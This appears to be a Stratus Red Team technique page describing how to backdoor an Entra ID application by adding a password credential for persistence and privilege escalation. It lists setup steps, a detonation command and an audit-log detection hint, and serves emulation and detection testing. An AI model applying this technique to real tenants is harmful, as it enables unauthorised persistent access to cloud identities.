Backdoor Entra ID application

Platform: Entra ID

MITRE ATT&CK Tactics

• Persistence
• Privilege Escalation

Description

Backdoors an existing Entra ID application by creating a new password credential.

Warm-up:

• Create an Entra ID application and associated service principal
• Assign it the Directory Readers role at the tenant level (for illustration purposes)

Detonation:

• Backdoor the Entra ID application by creating a new password credential

Notes: The warm-up mimics what happens when you create an App Registration through the Azure portal. When you use the Azure portal, creating an App Registration automatically creates an associated service principal. When using the Microsoft Graph API, the service principal needs to be created separately.

References:

• https://www.microsoft.com/en-us/security/blog/2023/12/12/threat-actors-misuse-oauth-applications-to-automate-financially-driven-attacks/
• https://www.inversecos.com/2021/10/how-to-backdoor-azure-applications-and.html
• https://posts.specterops.io/azure-privilege-escalation-via-service-principal-abuse-210ae2be2a5
• https://redfoxsec.com/blog/azure-privilege-escalation-via-service-principal/

Instructions

Detonate with Stratus Red Team

stratus detonate entra-id.persistence.backdoor-application

Detection

Using Entra ID audit logs with the activity type Update application – Certificates and secrets management.